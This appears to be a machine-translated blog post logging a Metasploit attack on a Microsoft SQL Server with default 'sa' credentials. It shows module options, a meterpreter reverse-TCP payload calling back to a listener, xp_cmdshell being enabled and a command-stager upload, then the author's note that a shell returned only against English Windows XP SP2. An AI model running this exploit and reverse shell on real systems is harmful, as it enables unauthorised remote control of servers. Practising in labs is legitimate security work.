Geeks, please accept the hero post of 2021 Microsoft x Intel hacking contest>>>
The steps are as follows: 1
msf5 exploit(windows/mssql/mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD sa no The password for the specified username
RHOSTS 192.168.0.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
URIPATH no The URI to use for this exploit (default is random)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.22 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/mssql/mssql_payload) > exploit
[*] Started reverse TCP handler on 192.168.0.22:4444
[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...
[*] 192.168.0.20:1433 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 5.86% done (5996/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 7.33% done (7495/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 8.80% done (8994/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 10.26% done (10493/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 11.73% done (11992/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 13.19% done (13491/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 14.66% done (14990/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 16.13% done (16489/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 17.59% done (17988/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 19.06% done (19487/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 20.53% done (20986/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 21.99% done (22485/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 23.46% done (23984/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 24.92% done (25483/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 26.39% done (26982/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 27.86% done (28481/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 29.32% done (29980/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 30.79% done (31479/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 32.25% done (32978/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 33.72% done (34477/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 35.19% done (35976/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 36.65% done (37475/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 38.12% done (38974/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 39.58% done (40473/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 41.05% done (41972/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 42.52% done (43471/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 43.98% done (44970/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 45.45% done (46469/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 46.91% done (47968/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 48.38% done (49467/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 49.85% done (50966/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 51.31% done (52465/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 52.78% done (53964/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 54.24% done (55463/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 55.71% done (56962/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 57.18% done (58461/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 58.64% done (59960/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 60.11% done (61459/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 61.58% done (62958/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 63.04% done (64457/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 64.51% done (65956/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 65.97% done (67455/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 67.44% done (68954/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 68.91% done (70453/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 70.37% done (71952/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 71.84% done (73451/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 73.30% done (74950/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 74.77% done (76449/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 76.24% done (77948/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 77.70% done (79447/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 79.17% done (80946/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 80.63% done (82445/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 82.10% done (83944/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 83.57% done (85443/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 85.03% done (86942/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 86.50% done (88441/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 87.96% done (89940/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 89.43% done (91439/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 90.90% done (92938/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 92.36% done (94437/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 93.83% done (95936/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 95.29% done (97435/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/mssql/mssql_payload) >
What’s disturbing is the last sentence
Expand completed, but no session was created.
after three axes, I couldn’t return to the shell. I tried many ways to change the target’s operating system and Metasploit version. No matter how hard I tried, I finally found the answer from the book. The target should use the English version of Windows XP SP2, We should say “English version”, “English version” and “English version” three times about important things
after the replacement, it returned to the shell successfully. As for other systems, especially the Chinese version, I don’t know what to do
Similar Posts:
- Guide to using Windows expand suggester
- Windows XP SP1 Privilege Escalation
- Xampp Startup Error: Port 80 in use by “Unable to open process” with PID 4!
- [Solved] dns named[4076]: error (network unreachable) resol
- sockjs.js?9be2:1606 GET http://192.168.1.101:8080/sockjs-node/info?t=1583642185049 net::ERR_CONNE…
- [Solved] RPC mount export: RPC: Unable to receive; errno = No route to host
- [Solved] Linux Oracle bash: “sqlplus / as sysdba”: command not found
- Apache : Error: Apache shutdown unexpectedly [How to Solve]
- [Solved] Cannot run program “git.exe”: CreateProcess error=
- [Solved] An error occurred when installing the apk, Failure [INSTALL_FAILED_DEXOPT]